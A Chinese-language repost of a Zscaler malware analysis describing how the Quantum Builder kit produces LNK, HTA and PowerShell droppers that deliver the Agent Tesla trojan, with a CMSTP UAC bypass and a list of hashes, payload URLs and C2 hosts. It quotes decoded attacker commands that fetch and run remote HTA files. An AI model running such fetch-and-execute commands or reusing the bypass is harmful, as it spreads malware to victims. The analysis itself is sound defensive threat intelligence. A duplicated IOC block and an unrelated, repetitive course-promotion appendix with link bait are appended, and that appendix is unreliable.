Quantum 构建工具使用新的 TTP 投递 Agent Tesla

Zscaler 的研究人员发现暗网上正在出售名为 Quantum Builder 的构建工具，该工具可以投递 .NET 远控木马 Agent
Tesla。与过去的攻击行动相比，本次攻击转向使用 LNK 文件。

Quantum Builder 能够创建恶意文件，如 LNK、HTA 与 PowerShell，最后投递 Agent Tesla。攻击者使用复杂的技术来生成
Payload：

使用 CMSTP 绕过用户账户控制，以便以管理权限执行最终 Payload 并关闭 Windows Defender

利用集成了无文件攻击等多种攻击向量的多阶段感染链

在内存中执行 PowerShell 脚本以进行逃避检测

打开诱饵分散受害者的注意力

后文对感染链进行了深入分析，并对 Quantum Builder 生成的 Payload 进行了比较。

感染链

感染链始于鱼叉邮件，其中包含一个携带 GZIP 文档的 LNK 文件。执行 LNK 文件后，嵌入的 PowerShell 代码会生成 MSHTA
来执行远程服务器上的 HTA 文件。

感染链

HTA 文件解密 PowerShell 脚本，在执行 AES 解密和 GZIP 解压缩后解密并加载另一个 PowerShell 脚本。解密后的
PowerShell 脚本是一个 Downloader，通过远程服务器下载 Agent Tesla，再使用 CMSTP 绕过 UAC 以管理权限执行。

技术分析

鱼叉邮件的主题为订单确认，如下所示：

鱼叉邮件

邮件带有一个 GZIP 文件作为附件，与带有 PDF 图标的恶意 LNK 文件捆绑在一起。执行后 LNK 文件会运行混淆的 PowerShell 代码，经过
base64 解编码与异或解密得到执行命令 IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/ordr[.]hta。

执行混淆代码

通过
MSHTA 执行远程服务器上的 HTA 文件

HTA 文件包含多个千余行的垃圾 VBS 函数，其中只有一个与恶意行为有关。

HTA
主要函数

解密出来的 PowerShell 脚本如下所示：

解密
PowerShell 代码

解密完成后，恶意函数就会通过 CreateObject() 创建一个 Wscript.Shell 对象，然后通过 Run 方法执行解密后的
PowerShell 脚本。

PowerShell
代码执行

解密的代码以隐藏窗口的形式执行，解密后会获取另一个 PowerShell 代码。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tu5PDviL-1692845095692)(https://image.3001.net/images/20221002/1664726047_6339b41f4580de2025f13.png!small)]执行新的
PowerShell 代码

IEX 函数执行 AES 解密与 GZIP 解压是关键的 PowerShell 代码：

从远程服务器下载 Agent Tesla 的 Payload

执行 CMSTP 绕过 UAC

通过操作文件属性隐藏 Agent Tesla

Agent Tesla 被硬编码命名为 MuUQDuaFNoGmHQE.exe，并且被最终执行：

解密
PowerShell 代码

解密可获取 Agent Tesla 的部署地址：

URL
解密

下载
Agent Tesla

通过 WriteAllBytes() 函数写入磁盘，路径为
C:\Users\<username>\AppData\Roaming\MuUQDuaFNoGmHQE.exe：

写入指定位置

Agent Tesla 二进制文件的路径作为参数传递给 PowerShell 脚本中的 CMSTP UAC Bypass
函数。该函数最初解码一个特别大的、base64 编码的数据块，如下所示：

CMSTP
UAC Bypass

解码后的代码是基于 PowerShell 的 CMSTP UAC Bypass PoC，在
[GitHub](https://github.com/tylerapplebaum/CMSTP-
UACBypass/blob/master/UACBypassCMSTP.ps1)上也能够找到。基于 PowerShell 的 CMSTP UAC 绕过
PoC 脚本在执行时会在 Temp 目录中写入恶意 INF 文件，其中 PowerShell 脚本中的 $CommandToExecute变量是
Agent Tesla 二进制文件的路径。

恶意
INF 文件

将 INF 文件写入临时目录后，PowerShell 代码会生成一个新进程 cmstp.exe，并以 /au $InfFileLocation作为参数，然后安装恶意 INF 文件，如下所示：

恶意
INF 文件作为参数执行 CMSTP

在 cmstp.exe 安装 INF 文件时，RunPreSetupCommandsSection 参数中的命令将以管理权限执行。该脚本将 [ENTER]
按键发送到活动的窗口应用程序，以便使用 SendKeys.SendWait() 函数自动执行。

触发
UAC 绕过

当以恶意 INF 作为参数生成 cmstp.exe 时，就会以管理权限执行恶意软件，如下所示：

UAC
绕过并以管理权限执行

Agent Tesla 的 C&C 服务器被配置为：

配置信息

C&C 通信如下所示：

C&C
通信

PowerShell 代码还通过操作隐藏文件属性来隐藏 Agent Tesla 二进制文件，如下所示：

隐藏文件

攻击变化

感染链的另一个变种，LNK 文件被捆绑在 ZIP 压缩包中。通过命令 Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta来执行远程 HTA
文件。通过将整数转换为字符然后替换空格并进一步利用 MSHTA 从远程 URL 执行 HTA 文件，如下所示。

通过
LNK 执行 HTA 文件

MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同，加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。

HTA
文件解密 PowerShell 代码

除了 Run() 方法之外，在某些情况下，HTA 文件利用 ShellExecute() 方法执行 PowerShell 代码，如下所示：

通过
ShellExecute() 执行代码

下载落地后，使用 Start-Process() 从 AppData 路径执行 Agent Tesla。如果 Payload 的扩展名为
.dll，则它使用 rundll32.exe 将 DLL 加载到虚拟内存中。

通过解密的
PowerShell 代码下载并执行 Agent Tesla

在某些情况下，还会有在内存中解密的 PowerShell 代码。代码使用 Invoke-Item
函数下载并执行了一个诱饵文件，以此来分散受害者的注意力，如下所示：

诱饵执行

C&C 服务器的配置为：

配置信息

C&C 通信如下所示：

C&C
通信

Quantum

这些恶意文件都是由名为 Quantum Builder 的构建工具创建的，如下所示：

Quantum
Builder

HTA 生成工具

HTA 生成工具如下所示：

HTA
生成工具

用户输入传递给 HTA Builder 函数以构造 HTA 文件，如下所示：

HTA
生成工具

将此代码与之前分析的 HTA 代码比较，可以确定 Payload 是由 Quantum Builder 生成的。

在野
HTA 文件

LNK 生成工具

LNK 生成工具如下所示：

LNK
生成工具

快捷方式的构造参数有 Description、IconLocation、Target Path、Arguments 和 WindowStyle，如下所示：

LNK
生成工具

将此代码与之前分析的 LNK 代码比较，可以确定 Payload 是由 Quantum Builder 生成的。

在野
LNK 文件

LNK 构建工具还可以生成 ISO 文件的 Payload，如下所示：

ISO
生成工具

Quantum Builder 已被攻击者多次利用，部署了多个恶意软件家族：

RedLine Stealer

IcedID

GuLoader

RemcosRAT and AsyncRAT

结论

攻击者会不断更新技术手段，利用各种恶意软件进行攻击。本次使用的 Agent Tesla 是最新的，Quantum Builder
已经被应用在各种攻击活动中投递各种恶意样本。

IOC

3edfa0cf3b7d54c24013e4f0019dba20
bb914889d5edc6b56c666d2e44e1a437
1adc0bd494cd42578ac8c8e726d5ad92
31c341ad31224cc7d38a5c4e80ccb727
f931773a226809669cad91410a57267f
d9433faddcaca526b26f713e27e2505f
213ada506251c477480bd14ea5507bf3
0ebb9d422f8e86458d8fa7f66fe1d0f1
563fda5da81a5e7818d771222e81f6c4
filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta
filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta
179[.]43[.]175[.]187/puao/PAYMENT[.]hta
179[.]43[.]175[.]187/puao/PO-M6888722[.]hta
filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe
179[.]43[.]175[.]187/puao/PAYMENTS[.]exe
179[.]43[.]175[.]187/puao/PO-M6888757[.]exe
mail[.]thesharpening.com[.]au
ftp[.]qurvegraphics[.]com

参考来源

[Zscaler](https://www.zscaler.com/blogs/security-research/agent-tesla-rat-
delivered-quantum-builder-new-ttps)

MENTS[.]exe

179[.]43[.]175[.]187/puao/PO-M6888757[.]exe
mail[.]thesharpening.com[.]au
ftp[.]qurvegraphics[.]com

参考来源

[Zscaler](https://www.zscaler.com/blogs/security-research/agent-tesla-rat-
delivered-quantum-builder-new-ttps)

题外话

初入计算机行业的人或者大学计算机相关专业毕业生，很多因缺少实战经验，就业处处碰壁。下面我们来看两组数据：

2023届全国高校毕业生预计达到1158万人，就业形势严峻；

国家网络安全宣传周公布的数据显示，到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻，一方面是网络安全人才百万缺口。

6月9日，麦可思研究2023年版就业蓝皮书（包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》）正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中，本科计算机类专业起薪与2021届基本持平，高职自动化类月收入增长明显，2022届反超铁道运输类专业（5295元）排在第一位。

具体看专业，2022届本科月收入较高的专业是信息安全（7579元）。对比2018届，电子科学与技术、自动化等与人工智能相关的本科专业表现不俗，较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼，已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nB3S36Bp-1692845095722)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20230809162658551.png)]

“没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万！

2、人才缺口大，就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表：我国网络空间安全人才 需求140万人，而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W，现在从事网络安全行业的从业人员只有10W人。

行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VXtuyQZy-1692845095723)(C:\Users\Administrator\Desktop\网安思维导图\享学首创年薪40W+网络安全工程师 青铜到王者技术成长路线V4.0.png)]

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iSEODuAY-1692845095724)(C:\Users\Administrator\Desktop\网安资料截图\视频课件.jpeg)]

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！